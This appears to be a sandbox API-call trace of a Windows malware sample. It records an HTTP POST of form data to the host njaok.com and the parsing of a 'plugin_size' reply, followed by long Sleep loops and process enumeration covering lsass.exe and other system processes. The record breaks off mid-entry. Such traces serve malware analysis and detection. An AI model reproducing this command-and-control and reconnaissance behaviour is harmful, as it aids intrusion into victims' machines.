wsprintfW (in: param_1=0x83003f0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://njaok.com/") returned 39 [0246.492] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300530) returned 0x17 [0246.492] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300530) returned 1 [0246.492] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300510) returned 0x12 [0246.492] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300510) returned 1 [0246.492] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300390) returned 0x4e [0246.492] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300390) returned 1 [0246.493] WinHttpAddRequestHeaders (hRequest=0x71c9ba0, pwszHeaders="Accept: */*\r\nReferer: http://njaok.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0246.493] WinHttpSendRequest (hRequest=0x71c9ba0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x8300120*, dwOptionalLength=0xaf, dwTotalLength=0xaf, dwContext=0x0) returned 1 [0246.813] WinHttpReceiveResponse (hRequest=0x71c9ba0, lpReserved=0x0) returned 1 [0246.813] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2800) returned 0x7f12350 [0246.813] WinHttpReadData (in: hRequest=0x71c9ba0, lpBuffer=0x7f12350, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f12350*, lpdwNumberOfBytesRead=0x7d6f928*=0x18) returned 1 [0246.815] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f12350, Size=0x5000) returned 0x7f12350 [0246.815] WinHttpReadData (in: hRequest=0x71c9ba0, lpBuffer=0x7f12368, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f12368*, lpdwNumberOfBytesRead=0x7d6f928*=0x0) returned 1 [0246.815] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x25b0000 [0246.817] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12350) returned 1 [0246.817] WinHttpCloseHandle (hInternet=0x71c9ba0) returned 1 [0246.817] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83003f0) returned 0x10d [0246.818] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83003f0) returned 1 [0246.818] WinHttpCloseHandle (hInternet=0x3f83fd0) returned 1 [0246.818] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300320) returned 0x68 [0246.818] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300320) returned 1 [0246.818] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300300) returned 0x12 [0246.818] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300300) returned 1 [0246.818] WinHttpCloseHandle (hInternet=0x3fb03a0) returned 1 [0246.818] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83001e0) returned 0x10c [0246.818] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83001e0) returned 1 [0246.819] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83000a0) returned 0x69 [0246.819] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83000a0) returned 1 [0246.819] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300120) returned 0xb8 [0246.819] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300120) returned 1 [0246.820] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0246.820] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x15) returned 0x83000a0 [0246.820] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0246.820] lstrlenA (lpString="plugin_size") returned 11 [0246.820] atoi (_Str="0") returned 0 [0246.820] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0246.820] lstrlenA (lpString="|:|") returned 3 [0246.820] MapViewOfFile (hFileMappingObject=0x1508, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5e50000 [0246.830] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0246.830] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x5e50000) returned 0x0 [0246.860] atoi (_Str="0") returned 0 [0246.860] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.861] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x26 [0246.861] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0246.862] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0246.862] Sleep (dwMilliseconds=0x258) [0246.908] Sleep (dwMilliseconds=0x258) [0246.952] Sleep (dwMilliseconds=0x258) [0246.995] Sleep (dwMilliseconds=0x258) [0247.037] Sleep (dwMilliseconds=0x258) [0247.063] Sleep (dwMilliseconds=0x258) [0247.064] Sleep (dwMilliseconds=0x258) [0247.065] Sleep (dwMilliseconds=0x258) [0247.065] Sleep (dwMilliseconds=0x258) [0247.067] Sleep (dwMilliseconds=0x258) [0247.069] Sleep (dwMilliseconds=0x258) [0247.070] Sleep (dwMilliseconds=0x258) [0247.072] Sleep (dwMilliseconds=0x258) [0247.076] Sleep (dwMilliseconds=0x258) [0247.080] Sleep (dwMilliseconds=0x258) [0247.083] Sleep (dwMilliseconds=0x258) [0247.085] Sleep (dwMilliseconds=0x258) [0247.086] Sleep (dwMilliseconds=0x258) [0247.086] Sleep (dwMilliseconds=0x258) [0247.088] Sleep (dwMilliseconds=0x258) [0247.089] Sleep (dwMilliseconds=0x258) [0247.091] Sleep (dwMilliseconds=0x258) [0247.092] Sleep (dwMilliseconds=0x258) [0247.094] Sleep (dwMilliseconds=0x258) [0247.095] Sleep (dwMilliseconds=0x258) [0247.095] Sleep (dwMilliseconds=0x258) [0247.098] Sleep (dwMilliseconds=0x258) [0247.100] Sleep (dwMilliseconds=0x258) [0247.103] Sleep (dwMilliseconds=0x258) [0247.106] Sleep (dwMilliseconds=0x258) [0247.107] Sleep (dwMilliseconds=0x258) [0247.108] Sleep (dwMilliseconds=0x258) [0247.110] Sleep (dwMilliseconds=0x258) [0247.111] Sleep (dwMilliseconds=0x258) [0247.112] Sleep (dwMilliseconds=0x258) [0247.114] Sleep (dwMilliseconds=0x258) [0247.117] Sleep (dwMilliseconds=0x258) [0247.119] Sleep (dwMilliseconds=0x258) [0247.121] Sleep (dwMilliseconds=0x258) [0247.122] Sleep (dwMilliseconds=0x258) [0247.124] Sleep (dwMilliseconds=0x258) [0247.124] Sleep (dwMilliseconds=0x258) [0247.126] Sleep (dwMilliseconds=0x258) [0247.127] Sleep (dwMilliseconds=0x258) [0247.127] Sleep (dwMilliseconds=0x258) [0247.129] Sleep (dwMilliseconds=0x258) [0247.130] Sleep (dwMilliseconds=0x258) [0247.131] Sleep (dwMilliseconds=0x258) [0247.132] Sleep (dwMilliseconds=0x258) [0247.138] Sleep (dwMilliseconds=0x258) [0247.139] Sleep (dwMilliseconds=0x258) [0247.140] Sleep (dwMilliseconds=0x258) [0247.143] Sleep (dwMilliseconds=0x258) [0247.144] Sleep (dwMilliseconds=0x258) [0247.148] Sleep (dwMilliseconds=0x258) [0247.152] Sleep (dwMilliseconds=0x258) [0247.192] Sleep (dwMilliseconds=0x258) [0247.233] Sleep (dwMilliseconds=0x258) [0247.295] Sleep (dwMilliseconds=0x258) [0247.350] Sleep (dwMilliseconds=0x258) [0247.370] Sleep (dwMilliseconds=0x258) [0247.372] Sleep (dwMilliseconds=0x258) [0247.373] Sleep (dwMilliseconds=0x258) [0247.374] Sleep (dwMilliseconds=0x258) [0247.376] Sleep (dwMilliseconds=0x258) [0247.377] Sleep (dwMilliseconds=0x258) [0247.380] Sleep (dwMilliseconds=0x258) [0247.382] Sleep (dwMilliseconds=0x258) [0247.384] Sleep (dwMilliseconds=0x258) [0247.387] Sleep (dwMilliseconds=0x258) [0247.388] Sleep (dwMilliseconds=0x258) [0247.391] Sleep (dwMilliseconds=0x258) [0247.394] Sleep (dwMilliseconds=0x258) [0247.394] Sleep (dwMilliseconds=0x258) [0247.402] Sleep (dwMilliseconds=0x258) [0247.406] Sleep (dwMilliseconds=0x258) [0247.407] Sleep (dwMilliseconds=0x258) [0247.408] Sleep (dwMilliseconds=0x258) [0247.408] Sleep (dwMilliseconds=0x258) [0247.409] Sleep (dwMilliseconds=0x258) [0247.411] Sleep (dwMilliseconds=0x258) [0247.414] Sleep (dwMilliseconds=0x258) [0247.417] Sleep (dwMilliseconds=0x258) [0247.418] Sleep (dwMilliseconds=0x258) [0247.424] Sleep (dwMilliseconds=0x258) [0247.425] Sleep (dwMilliseconds=0x258) [0247.427] Sleep (dwMilliseconds=0x258) [0247.429] Sleep (dwMilliseconds=0x258) [0247.435] Sleep (dwMilliseconds=0x258) [0247.437] Sleep (dwMilliseconds=0x258) [0247.439] Sleep (dwMilliseconds=0x258) [0247.440] Sleep (dwMilliseconds=0x258) [0247.442] Sleep (dwMilliseconds=0x258) [0247.443] Sleep (dwMilliseconds=0x258) [0247.444] Sleep (dwMilliseconds=0x258) [0247.446] Sleep (dwMilliseconds=0x258) [0247.448] Sleep (dwMilliseconds=0x258) [0247.452] Sleep (dwMilliseconds=0x258) [0247.453] Sleep (dwMilliseconds=0x258) [0247.457] Sleep (dwMilliseconds=0x258) [0247.458] Sleep (dwMilliseconds=0x258) [0247.459] Sleep (dwMilliseconds=0x258) [0247.460] Sleep (dwMilliseconds=0x258) [0247.462] Sleep (dwMilliseconds=0x258) [0247.463] Sleep (dwMilliseconds=0x258) [0247.506] Sleep (dwMilliseconds=0x258) [0247.548] Sleep (dwMilliseconds=0x258) [0247.621] Sleep (dwMilliseconds=0x258) [0247.917] Sleep (dwMilliseconds=0x258) [0249.054] Sleep (dwMilliseconds=0x258) [0249.255] Sleep (dwMilliseconds=0x258) [0249.441] Sleep (dwMilliseconds=0x258) [0249.487] Sleep (dwMilliseconds=0x258) [0249.498] Sleep (dwMilliseconds=0x258) [0249.530] Sleep (dwMilliseconds=0x258) [0249.535] Sleep (dwMilliseconds=0x258) [0249.598] Sleep (dwMilliseconds=0x258) [0249.646] Sleep (dwMilliseconds=0x258) [0249.683] Sleep (dwMilliseconds=0x258) [0249.691] Sleep (dwMilliseconds=0x258) [0249.731] Sleep (dwMilliseconds=0x258) [0249.741] Sleep (dwMilliseconds=0x258) [0249.759] Sleep (dwMilliseconds=0x258) [0249.760] Sleep (dwMilliseconds=0x258) [0249.800] Sleep (dwMilliseconds=0x258) [0250.070] Sleep (dwMilliseconds=0x258) [0250.136] Sleep (dwMilliseconds=0x258) [0250.138] Sleep (dwMilliseconds=0x258) [0250.144] Sleep (dwMilliseconds=0x258) [0250.191] Sleep (dwMilliseconds=0x258) [0250.199] Sleep (dwMilliseconds=0x258) [0250.240] Sleep (dwMilliseconds=0x258) [0250.301] Sleep (dwMilliseconds=0x258) [0250.344] Sleep (dwMilliseconds=0x258) [0250.403] Sleep (dwMilliseconds=0x258) [0250.412] Sleep (dwMilliseconds=0x258) [0250.418] Sleep (dwMilliseconds=0x258) [0250.443] Sleep (dwMilliseconds=0x258) [0250.454] Sleep (dwMilliseconds=0x258) [0250.984] Sleep (dwMilliseconds=0x258) [0251.030] Sleep (dwMilliseconds=0x258) [0251.075] Sleep (dwMilliseconds=0x258) [0251.127] Sleep (dwMilliseconds=0x258) [0251.386] Sleep (dwMilliseconds=0x258) [0251.464] Sleep (dwMilliseconds=0x258) [0251.510] Sleep (dwMilliseconds=0x258) [0251.542] Sleep (dwMilliseconds=0x258) [0251.700] Sleep (dwMilliseconds=0x258) [0251.761] Sleep (dwMilliseconds=0x258) [0251.860] Sleep (dwMilliseconds=0x258) [0251.912] Sleep (dwMilliseconds=0x258) [0251.918] Sleep (dwMilliseconds=0x258) [0251.957] Sleep (dwMilliseconds=0x258) [0251.963] Sleep (dwMilliseconds=0x258) [0251.980] Sleep (dwMilliseconds=0x258) [0252.040] Sleep (dwMilliseconds=0x258) [0252.102] Sleep (dwMilliseconds=0x258) [0252.130] Sleep (dwMilliseconds=0x258) [0252.142] Sleep (dwMilliseconds=0x258) [0252.156] Sleep (dwMilliseconds=0x258) [0252.166] Sleep (dwMilliseconds=0x258) [0252.188] Sleep (dwMilliseconds=0x258) [0252.727] Sleep (dwMilliseconds=0x258) [0252.817] Sleep (dwMilliseconds=0x258) [0252.916] Sleep (dwMilliseconds=0x258) [0254.089] Sleep (dwMilliseconds=0x258) [0254.211] Sleep (dwMilliseconds=0x258) [0254.366] Sleep (dwMilliseconds=0x258) [0254.738] Sleep (dwMilliseconds=0x258) [0254.877] Sleep (dwMilliseconds=0x258) [0255.414] Sleep (dwMilliseconds=0x258) [0256.166] Sleep (dwMilliseconds=0x258) [0256.527] Sleep (dwMilliseconds=0x258) [0256.584] Sleep (dwMilliseconds=0x258) [0256.800] Sleep (dwMilliseconds=0x258) [0256.878] Sleep (dwMilliseconds=0x258) [0257.094] Sleep (dwMilliseconds=0x258) [0257.933] Sleep (dwMilliseconds=0x258) [0258.078] Sleep (dwMilliseconds=0x258) [0258.188] Sleep (dwMilliseconds=0x258) [0258.297] Sleep (dwMilliseconds=0x258) [0258.635] Sleep (dwMilliseconds=0x258) [0258.778] Sleep (dwMilliseconds=0x258) [0258.938] Sleep (dwMilliseconds=0x258) [0259.482] Sleep (dwMilliseconds=0x258) [0259.591] Sleep (dwMilliseconds=0x258) [0259.736] Sleep (dwMilliseconds=0x258) [0259.875] Sleep (dwMilliseconds=0x258) [0260.048] Sleep (dwMilliseconds=0x258) [0260.190] Sleep (dwMilliseconds=0x258) [0260.332] Sleep (dwMilliseconds=0x258) [0260.461] Sleep (dwMilliseconds=0x258) [0260.555] Sleep (dwMilliseconds=0x258) [0260.622] Sleep (dwMilliseconds=0x258) [0260.714] Sleep (dwMilliseconds=0x258) [0260.825] Sleep (dwMilliseconds=0x258) [0260.951] Sleep (dwMilliseconds=0x258) [0261.077] Sleep (dwMilliseconds=0x258) [0261.256] Sleep (dwMilliseconds=0x258) [0261.485] Sleep (dwMilliseconds=0x258) [0261.569] Sleep (dwMilliseconds=0x258) [0261.738] Sleep (dwMilliseconds=0x258) [0262.184] Sleep (dwMilliseconds=0x258) [0262.363] Sleep (dwMilliseconds=0x258) [0262.413] Sleep (dwMilliseconds=0x258) [0262.530] Sleep (dwMilliseconds=0x258) [0263.694] Sleep (dwMilliseconds=0x258) [0263.920] Sleep (dwMilliseconds=0x258) [0264.006] Sleep (dwMilliseconds=0x258) [0264.090] Sleep (dwMilliseconds=0x258) [0264.216] Sleep (dwMilliseconds=0x258) [0264.257] Sleep (dwMilliseconds=0x258) [0264.303] Sleep (dwMilliseconds=0x258) [0264.382] Sleep (dwMilliseconds=0x258) [0264.505] Sleep (dwMilliseconds=0x258) [0264.552] Sleep (dwMilliseconds=0x258) [0264.652] Sleep (dwMilliseconds=0x258) [0264.848] Sleep (dwMilliseconds=0x258) [0264.954] Sleep (dwMilliseconds=0x258) [0265.139] Sleep (dwMilliseconds=0x258) [0265.211] Sleep (dwMilliseconds=0x258) [0265.242] Sleep (dwMilliseconds=0x258) [0265.334] Sleep (dwMilliseconds=0x258) [0265.456] Sleep (dwMilliseconds=0x258) [0265.528] Sleep (dwMilliseconds=0x258) [0265.604] Sleep (dwMilliseconds=0x258) [0265.692] Sleep (dwMilliseconds=0x258) [0265.762] Sleep (dwMilliseconds=0x258) [0265.791] Sleep (dwMilliseconds=0x258) [0265.836] Sleep (dwMilliseconds=0x258) [0265.958] Sleep (dwMilliseconds=0x258) [0266.045] Sleep (dwMilliseconds=0x258) [0266.126] Sleep (dwMilliseconds=0x258) [0266.165] Sleep (dwMilliseconds=0x258) [0266.424] Sleep (dwMilliseconds=0x258) [0266.517] Sleep (dwMilliseconds=0x258) [0266.660] Sleep (dwMilliseconds=0x258) [0266.778] Sleep (dwMilliseconds=0x258) [0266.932] Sleep (dwMilliseconds=0x258) [0266.943] Sleep (dwMilliseconds=0x258) [0267.110] Sleep (dwMilliseconds=0x258) [0267.313] Sleep (dwMilliseconds=0x258) [0267.484] Sleep (dwMilliseconds=0x258) [0267.492] Sleep (dwMilliseconds=0x258) [0267.502] Sleep (dwMilliseconds=0x258) [0267.522] Sleep (dwMilliseconds=0x258) [0267.976] Sleep (dwMilliseconds=0x258) [0268.120] Sleep (dwMilliseconds=0x258) [0268.219] Sleep (dwMilliseconds=0x258) [0268.395] Sleep (dwMilliseconds=0x258) [0268.422] Sleep (dwMilliseconds=0x258) [0268.657] Sleep (dwMilliseconds=0x258) [0268.681] Sleep (dwMilliseconds=0x258) [0268.732] Sleep (dwMilliseconds=0x258) [0269.007] Sleep (dwMilliseconds=0x258) [0269.076] Sleep (dwMilliseconds=0x258) [0269.255] Sleep (dwMilliseconds=0x258) [0269.357] Sleep (dwMilliseconds=0x258) [0269.407] Sleep (dwMilliseconds=0x258) [0269.474] Sleep (dwMilliseconds=0x258) [0269.484] Sleep (dwMilliseconds=0x258) [0269.514] Sleep (dwMilliseconds=0x258) [0269.553] Sleep (dwMilliseconds=0x258) [0269.715] Sleep (dwMilliseconds=0x258) [0269.835] Sleep (dwMilliseconds=0x258) [0269.877] Sleep (dwMilliseconds=0x258) [0269.939] Sleep (dwMilliseconds=0x258) [0270.074] Sleep (dwMilliseconds=0x258) [0270.170] Sleep (dwMilliseconds=0x258) [0270.282] Sleep (dwMilliseconds=0x258) [0270.370] Sleep (dwMilliseconds=0x258) [0270.464] Sleep (dwMilliseconds=0x258) [0270.881] Sleep (dwMilliseconds=0x258) [0271.022] Sleep (dwMilliseconds=0x258) [0271.146] Sleep (dwMilliseconds=0x258) [0271.257] Sleep (dwMilliseconds=0x258) [0271.291] Sleep (dwMilliseconds=0x258) [0271.353] Sleep (dwMilliseconds=0x258) [0271.369] Sleep (dwMilliseconds=0x258) [0271.447] Sleep (dwMilliseconds=0x258) [0271.525] Sleep (dwMilliseconds=0x258) [0271.578] Sleep (dwMilliseconds=0x258) [0271.685] Sleep (dwMilliseconds=0x258) [0271.823] Sleep (dwMilliseconds=0x258) [0271.916] Sleep (dwMilliseconds=0x258) [0272.111] Sleep (dwMilliseconds=0x258) [0272.192] Sleep (dwMilliseconds=0x258) [0272.273] Sleep (dwMilliseconds=0x258) [0272.323] Sleep (dwMilliseconds=0x258) [0272.445] Sleep (dwMilliseconds=0x258) [0272.517] Sleep (dwMilliseconds=0x258) [0272.588] Sleep (dwMilliseconds=0x258) [0272.732] Sleep (dwMilliseconds=0x258) [0272.884] Sleep (dwMilliseconds=0x258) [0273.061] Sleep (dwMilliseconds=0x258) [0273.257] Sleep (dwMilliseconds=0x258) [0273.439] Sleep (dwMilliseconds=0x258) [0273.527] Sleep (dwMilliseconds=0x258) [0273.580] Sleep (dwMilliseconds=0x258) [0273.635] Sleep (dwMilliseconds=0x258) [0273.672] Sleep (dwMilliseconds=0x258) [0273.686] Sleep (dwMilliseconds=0x258) [0273.699] Sleep (dwMilliseconds=0x258) [0273.757] Sleep (dwMilliseconds=0x258) [0273.841] Sleep (dwMilliseconds=0x258) [0273.892] Sleep (dwMilliseconds=0x258) [0273.975] Sleep (dwMilliseconds=0x258) [0274.041] Sleep (dwMilliseconds=0x258) [0274.163] Sleep (dwMilliseconds=0x258) [0274.219] Sleep (dwMilliseconds=0x258) [0274.271] Sleep (dwMilliseconds=0x258) [0274.292] Sleep (dwMilliseconds=0x258) [0274.567] Sleep (dwMilliseconds=0x258) [0274.895] Sleep (dwMilliseconds=0x258) [0275.085] Sleep (dwMilliseconds=0x258) [0275.159] Sleep (dwMilliseconds=0x258) [0275.255] Sleep (dwMilliseconds=0x258) [0275.406] Sleep (dwMilliseconds=0x258) [0275.488] Sleep (dwMilliseconds=0x258) [0275.506] Sleep (dwMilliseconds=0x258) [0275.585] Sleep (dwMilliseconds=0x258) [0275.698] Sleep (dwMilliseconds=0x258) [0275.746] Sleep (dwMilliseconds=0x258) [0275.830] Sleep (dwMilliseconds=0x258) [0275.848] Sleep (dwMilliseconds=0x258) [0275.917] Sleep (dwMilliseconds=0x258) [0276.132] Sleep (dwMilliseconds=0x258) [0276.315] Sleep (dwMilliseconds=0x258) [0276.466] Sleep (dwMilliseconds=0x258) [0276.642] Sleep (dwMilliseconds=0x258) [0276.816] Sleep (dwMilliseconds=0x258) [0277.035] Sleep (dwMilliseconds=0x258) [0277.143] Sleep (dwMilliseconds=0x258) [0277.297] Sleep (dwMilliseconds=0x258) [0277.522] Sleep (dwMilliseconds=0x258) [0277.654] Sleep (dwMilliseconds=0x258) [0277.785] Sleep (dwMilliseconds=0x258) [0277.975] Sleep (dwMilliseconds=0x258) [0278.146] Sleep (dwMilliseconds=0x258) [0278.226] Sleep (dwMilliseconds=0x258) [0278.329] Sleep (dwMilliseconds=0x258) [0278.487] Sleep (dwMilliseconds=0x258) [0278.548] Sleep (dwMilliseconds=0x258) [0278.779] Sleep (dwMilliseconds=0x258) [0279.030] Sleep (dwMilliseconds=0x258) [0279.305] Sleep (dwMilliseconds=0x258) [0279.438] Sleep (dwMilliseconds=0x258) [0279.616] Sleep (dwMilliseconds=0x258) [0279.762] Sleep (dwMilliseconds=0x258) [0279.951] Sleep (dwMilliseconds=0x258) [0280.153] Sleep (dwMilliseconds=0x258) [0280.317] Sleep (dwMilliseconds=0x258) [0280.507] Sleep (dwMilliseconds=0x258) [0280.684] Sleep (dwMilliseconds=0x258) [0280.871] Sleep (dwMilliseconds=0x258) [0281.232] Sleep (dwMilliseconds=0x258) [0281.425] Sleep (dwMilliseconds=0x258) [0281.558] Sleep (dwMilliseconds=0x258) [0281.706] Sleep (dwMilliseconds=0x258) [0281.853] Sleep (dwMilliseconds=0x258) [0282.014] Sleep (dwMilliseconds=0x258) [0282.170] Sleep (dwMilliseconds=0x258) [0282.648] Sleep (dwMilliseconds=0x258) [0283.414] Sleep (dwMilliseconds=0x258) [0283.677] Sleep (dwMilliseconds=0x258) [0283.835] Sleep (dwMilliseconds=0x258) [0284.738] Sleep (dwMilliseconds=0x258) [0285.067] Sleep (dwMilliseconds=0x258) [0289.320] Sleep (dwMilliseconds=0x258) [0289.451] Sleep (dwMilliseconds=0x258) [0289.762] Sleep (dwMilliseconds=0x258) [0289.902] Sleep (dwMilliseconds=0x258) [0290.201] Sleep (dwMilliseconds=0x258) [0290.260] Sleep (dwMilliseconds=0x258) [0290.370] Sleep (dwMilliseconds=0x258) [0290.464] Sleep (dwMilliseconds=0x258) [0290.542] Sleep (dwMilliseconds=0x258) [0290.661] Sleep (dwMilliseconds=0x258) [0290.735] Sleep (dwMilliseconds=0x258) [0290.862] Sleep (dwMilliseconds=0x258) [0291.333] Sleep (dwMilliseconds=0x258) [0291.400] Sleep (dwMilliseconds=0x258) [0291.646] Sleep (dwMilliseconds=0x258) [0292.036] Sleep (dwMilliseconds=0x258) [0292.147] Sleep (dwMilliseconds=0x258) [0292.308] Sleep (dwMilliseconds=0x258) [0292.455] Sleep (dwMilliseconds=0x258) [0292.589] Sleep (dwMilliseconds=0x258) [0292.678] Sleep (dwMilliseconds=0x258) [0292.730] Sleep (dwMilliseconds=0x258) [0293.062] Sleep (dwMilliseconds=0x258) [0293.105] Sleep (dwMilliseconds=0x258) [0293.516] Sleep (dwMilliseconds=0x258) [0293.638] Sleep (dwMilliseconds=0x258) Thread: id = 40 os_tid = 0xe6c [0085.463] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1484 [0085.488] Process32First (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.489] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0085.491] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0085.492] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0085.493] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0085.495] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0085.496] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0085.498] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0085.499] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0085.500] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0085.502] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.503] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.505] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.506] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.507] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1c8, pcPriClassBase=8, 